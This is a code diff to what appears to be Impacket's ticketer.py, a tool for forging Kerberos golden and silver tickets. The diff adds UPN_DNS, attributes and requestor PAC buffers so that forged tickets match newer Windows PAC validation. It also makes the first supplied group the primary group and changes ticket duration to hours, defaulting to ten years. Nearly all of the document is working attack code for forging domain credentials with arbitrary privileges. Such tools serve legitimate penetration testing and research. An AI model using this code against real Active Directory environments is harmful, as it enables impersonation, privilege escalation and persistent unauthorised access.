@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
+# Copyright (C) 2023 Fortra. All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -59,7 +59,7 @@ from pyasn1.codec.der import encoder, decoder
 from pyasn1.type.univ import noValue
 
 from impacket import version
-from impacket.dcerpc.v5.dtypes import RPC_SID
+from impacket.dcerpc.v5.dtypes import RPC_SID, SID
 from impacket.dcerpc.v5.ndr import NDRULONG
 from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \
     SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD
@@ -73,7 +73,8 @@ from impacket.krb5.crypto import Key, _enctype_table
 from impacket.krb5.crypto import _checksum_table, Enctype
 from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \
     PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \
-    VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO
+    VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO, UPN_DNS_INFO_FULL, PAC_REQUESTOR_INFO, PAC_UPN_DNS_INFO, PAC_ATTRIBUTES_INFO, PAC_REQUESTOR, \
+    PAC_ATTRIBUTE_INFO
 from impacket.krb5.types import KerberosTime, Principal
 from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
 
@@ -102,6 +103,14 @@ class TICKETER:
         t += 116444736000000000
         return t
 
+    @staticmethod
+    def getPadLength(data_length):
+        return ((data_length + 7) // 8 * 8) - data_length
+
+    @staticmethod
+    def getBlockLength(data_length):
+        return (data_length + 7) // 8 * 8
+
     def loadKeysFromKeytab(self, filename):
         keytab = Keytab.loadFile(filename)
         keyblock = keytab.getKey("%s@%s" % (options.spn, self.__domain))
@@ -164,10 +173,15 @@ class TICKETER:
         kerbdata['LogonCount'] = 500
         kerbdata['BadPasswordCount'] = 0
         kerbdata['UserId'] = int(self.__options.user_id)
-        kerbdata['PrimaryGroupId'] = 513
 
         # Our Golden Well-known groups! :)
         groups = self.__options.groups.split(',')
+        if len(groups) == 0:
+            # PrimaryGroupId must be set, default to 513 (Domain User)
+            kerbdata['PrimaryGroupId'] = 513
+        else:
+            # Using first group as primary group
+            kerbdata['PrimaryGroupId'] = int(groups[0])
         kerbdata['GroupCount'] = len(groups)
 
         for group in groups:
@@ -232,8 +246,71 @@ class TICKETER:
         clientInfo['NameLength'] = len(clientInfo['Name'])
         pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData()
 
+        if self.__options.extra_pac:
+            self.createUpnDnsPac(pacInfos)
+
+        if self.__options.old_pac is False:
+            self.createAttributesInfoPac(pacInfos)
+            self.createRequestorInfoPac(pacInfos)
+
         return pacInfos
 
+    def createUpnDnsPac(self, pacInfos):
+        upnDnsInfo = UPN_DNS_INFO_FULL()
+
+        PAC_pad = b'\x00' * self.getPadLength(len(upnDnsInfo))
+        upn_data = f"{self.__target.lower()}@{self.__domain.lower()}".encode("utf-16-le")
+        upnDnsInfo['UpnLength'] = len(upn_data)
+        upnDnsInfo['UpnOffset'] = len(upnDnsInfo) + len(PAC_pad)
+        total_len = upnDnsInfo['UpnOffset'] + upnDnsInfo['UpnLength']
+        pad = self.getPadLength(total_len)
+        upn_data += b'\x00' * pad
+
+        dns_name = self.__domain.upper().encode("utf-16-le")
+        upnDnsInfo['DnsDomainNameLength'] = len(dns_name)
+        upnDnsInfo['DnsDomainNameOffset'] = total_len + pad
+        total_len = upnDnsInfo['DnsDomainNameOffset'] + upnDnsInfo['DnsDomainNameLength']
+        pad = self.getPadLength(total_len)
+        dns_name += b'\x00' * pad
+
+        # Enable additional data mode (Sam + SID)
+        upnDnsInfo['Flags'] = 2
+
+        samName = self.__target.encode("utf-16-le")
+        upnDnsInfo['SamNameLength'] = len(samName)
+        upnDnsInfo['SamNameOffset'] = total_len + pad
+        total_len = upnDnsInfo['SamNameOffset'] + upnDnsInfo['SamNameLength']
+        pad = self.getPadLength(total_len)
+        samName += b'\x00' * pad
+
+        user_sid = SID()
+        user_sid.fromCanonical(f"{self.__options.domain_sid}-{self.__options.user_id}")
+        upnDnsInfo['SidLength'] = len(user_sid)
+        upnDnsInfo['SidOffset'] = total_len + pad
+        total_len = upnDnsInfo['SidOffset'] + upnDnsInfo['SidLength']
+        pad = self.getPadLength(total_len)
+        user_data = user_sid.getData() + b'\x00' * pad
+
+        # Post-PAC data
+        post_pac_data = upn_data + dns_name + samName + user_data
+        # Pac data building
+        pacInfos[PAC_UPN_DNS_INFO] = upnDnsInfo.getData() + PAC_pad + post_pac_data
+
+    @staticmethod
+    def createAttributesInfoPac(pacInfos):
+        pacAttributes = PAC_ATTRIBUTE_INFO()
+        pacAttributes["FlagsLength"] = 2
+        pacAttributes["Flags"] = 1
+
+        pacInfos[PAC_ATTRIBUTES_INFO] = pacAttributes.getData()
+
+    def createRequestorInfoPac(self, pacInfos):
+        pacRequestor = PAC_REQUESTOR()
+        pacRequestor['UserSid'] = SID()
+        pacRequestor['UserSid'].fromCanonical(f"{self.__options.domain_sid}-{self.__options.user_id}")
+
+        pacInfos[PAC_REQUESTOR_INFO] = pacRequestor.getData()
+
     def createBasicTicket(self):
         if self.__options.request is True:
             if self.__domain == self.__server:
@@ -376,7 +453,7 @@ class TICKETER:
         flags.append(TicketFlags.forwardable.value)
         flags.append(TicketFlags.proxiable.value)
         flags.append(TicketFlags.renewable.value)
-        if self.__domain == self.__server: 
+        if self.__domain == self.__server:
             flags.append(TicketFlags.initial.value)
         flags.append(TicketFlags.pre_authent.value)
         encTicketPart['flags'] = encodeFlags(flags)
@@ -403,7 +480,7 @@ class TICKETER:
         encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
         encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
         # Let's extend the ticket's validity a lil bit
-        ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration))
+        ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
         encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
         encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
         encTicketPart['authorization-data'] = noValue
@@ -473,7 +550,7 @@ class TICKETER:
             if logging.getLogger().level == logging.DEBUG:
                 logging.debug('VALIDATION_INFO after making it gold')
                 validationInfo.dump()
-                print ('\n')
+                print('\n')
         else:
             raise Exception('PAC_LOGON_INFO not found! Aborting')
 
@@ -553,58 +630,120 @@ class TICKETER:
     def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):
         logging.info('Signing/Encrypting final ticket')
 
+        # Basic PAC count
+        pac_count = 4
+
         # We changed everything we needed to make us special. Now let's repack and calculate checksums
         validationInfoBlob = pacInfos[PAC_LOGON_INFO]
-        validationInfoAlignment = b'\x00' * (((len(validationInfoBlob) + 7) // 8 * 8) - len(validationInfoBlob))
+        validationInfoAlignment = b'\x00' * self.getPadLength(len(validationInfoBlob))
 
         pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]
-        pacClientInfoAlignment = b'\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob))
+        pacClientInfoAlignment = b'\x00' * self.getPadLength(len(pacClientInfoBlob))
+
+        pacUpnDnsInfoBlob = None
+        pacUpnDnsInfoAlignment = None
+        if PAC_UPN_DNS_INFO in pacInfos:
+            pac_count += 1
+            pacUpnDnsInfoBlob = pacInfos[PAC_UPN_DNS_INFO]
+            pacUpnDnsInfoAlignment = b'\x00' * self.getPadLength(len(pacUpnDnsInfoBlob))
+
+        pacAttributesInfoBlob = None
+        pacAttributesInfoAlignment = None
+        if PAC_ATTRIBUTES_INFO in pacInfos:
+            pac_count += 1
+            pacAttributesInfoBlob = pacInfos[PAC_ATTRIBUTES_INFO]
+            pacAttributesInfoAlignment = b'\x00' * self.getPadLength(len(pacAttributesInfoBlob))
+
+        pacRequestorInfoBlob = None
+        pacRequestorInfoAlignment = None
+        if PAC_REQUESTOR_INFO in pacInfos:
+            pac_count += 1
+            pacRequestorInfoBlob = pacInfos[PAC_REQUESTOR_INFO]
+            pacRequestorInfoAlignment = b'\x00' * self.getPadLength(len(pacRequestorInfoBlob))
 
         serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
         serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM]
-        serverChecksumAlignment = b'\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob))
+        serverChecksumAlignment = b'\x00' * self.getPadLength(len(serverChecksumBlob))
 
         privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
         privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM]
-        privSvrChecksumAlignment = b'\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob))
+        privSvrChecksumAlignment = b'\x00' * self.getPadLength(len(privSvrChecksumBlob))
 
         # The offset are set from the beginning of the PAC_TYPE
         # [MS-PAC] 2.4 PAC_INFO_BUFFER
-        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * 4
+        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * pac_count
 
         # Let's build the PAC_INFO_BUFFER for each one of the elements
         validationInfoIB = PAC_INFO_BUFFER()
         validationInfoIB['ulType'] = PAC_LOGON_INFO
         validationInfoIB['cbBufferSize'] = len(validationInfoBlob)
         validationInfoIB['Offset'] = offsetData
-        offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8
+        offsetData = self.getBlockLength(offsetData + validationInfoIB['cbBufferSize'])
 
         pacClientInfoIB = PAC_INFO_BUFFER()
         pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
         pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
         pacClientInfoIB['Offset'] = offsetData
-        offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8
+        offsetData = self.getBlockLength(offsetData + pacClientInfoIB['cbBufferSize'])
+
+        pacUpnDnsInfoIB = None
+        if pacUpnDnsInfoBlob is not None:
+            pacUpnDnsInfoIB = PAC_INFO_BUFFER()
+            pacUpnDnsInfoIB['ulType'] = PAC_UPN_DNS_INFO
+            pacUpnDnsInfoIB['cbBufferSize'] = len(pacUpnDnsInfoBlob)
+            pacUpnDnsInfoIB['Offset'] = offsetData
+            offsetData = self.getBlockLength(offsetData + pacUpnDnsInfoIB['cbBufferSize'])
+
+        pacAttributesInfoIB = None
+        if pacAttributesInfoBlob is not None:
+            pacAttributesInfoIB = PAC_INFO_BUFFER()
+            pacAttributesInfoIB['ulType'] = PAC_ATTRIBUTES_INFO
+            pacAttributesInfoIB['cbBufferSize'] = len(pacAttributesInfoBlob)
+            pacAttributesInfoIB['Offset'] = offsetData
+            offsetData = self.getBlockLength(offsetData + pacAttributesInfoIB['cbBufferSize'])
+
+        pacRequestorInfoIB = None
+        if pacRequestorInfoBlob is not None:
+            pacRequestorInfoIB = PAC_INFO_BUFFER()
+            pacRequestorInfoIB['ulType'] = PAC_REQUESTOR_INFO
+            pacRequestorInfoIB['cbBufferSize'] = len(pacRequestorInfoBlob)
+            pacRequestorInfoIB['Offset'] = offsetData
+            offsetData = self.getBlockLength(offsetData + pacRequestorInfoIB['cbBufferSize'])
 
         serverChecksumIB = PAC_INFO_BUFFER()
         serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
         serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
         serverChecksumIB['Offset'] = offsetData
-        offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8
+        offsetData = self.getBlockLength(offsetData + serverChecksumIB['cbBufferSize'])
 
         privSvrChecksumIB = PAC_INFO_BUFFER()
         privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
         privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
         privSvrChecksumIB['Offset'] = offsetData
-        # offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) //8 *8
+        # offsetData = self.getBlockLength(offsetData+privSvrChecksumIB['cbBufferSize'])
 
         # Building the PAC_TYPE as specified in [MS-PAC]
-        buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \
-            privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \
-            pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment
+        buffers = validationInfoIB.getData() + pacClientInfoIB.getData()
+        if pacUpnDnsInfoIB is not None:
+            buffers += pacUpnDnsInfoIB.getData()
+        if pacAttributesInfoIB is not None:
+            buffers += pacAttributesInfoIB.getData()
+        if pacRequestorInfoIB is not None:
+            buffers += pacRequestorInfoIB.getData()
+
+        buffers += serverChecksumIB.getData() + privSvrChecksumIB.getData() + validationInfoBlob + \
+            validationInfoAlignment + pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment
+        if pacUpnDnsInfoIB is not None:
+            buffers += pacUpnDnsInfoBlob + pacUpnDnsInfoAlignment
+        if pacAttributesInfoIB is not None:
+            buffers += pacAttributesInfoBlob + pacAttributesInfoAlignment
+        if pacRequestorInfoIB is not None:
+            buffers += pacRequestorInfoBlob + pacRequestorInfoAlignment
+
         buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
 
         pacType = PACTYPE()
-        pacType['cBuffers'] = 4
+        pacType['cBuffers'] = pac_count
         pacType['Version'] = 0
         pacType['Buffers'] = buffers + buffersTail
 
@@ -649,7 +788,7 @@ class TICKETER:
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('Customized EncTicketPart')
             print(encTicketPart.prettyPrint())
-            print ('\n')
+            print('\n')
 
         encodedEncTicketPart = encoder.encode(encTicketPart)
 
@@ -701,7 +840,7 @@ class TICKETER:
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('Final Golden Ticket')
             print(kdcRep.prettyPrint())
-            print ('\n')
+            print('\n')
 
         return encoder.encode(kdcRep), cipher, sessionKey
 
@@ -745,8 +884,11 @@ if __name__ == '__main__':
     parser.add_argument('-user-id', action="store", default = '500', help='user id for the user the ticket will be '
                                                                           'created for (default = 500)')
     parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC')
-    parser.add_argument('-duration', action="store", default = '3650', help='Amount of days till the ticket expires '
-                                                                            '(default = 365*10)')
+    parser.add_argument('-extra-pac', action='store_true', help='Populate your ticket with extra PAC (UPN_DNS)')
+    parser.add_argument('-old-pac', action='store_true', help='Use the old PAC structure to create your ticket (exclude '
+                                                              'PAC_ATTRIBUTES_INFO and PAC_REQUESTOR')
+    parser.add_argument('-duration', action="store", default = '87600', help='Amount of hours till the ticket expires '
+                                                                             '(default = 24*365*10)')
     parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
 
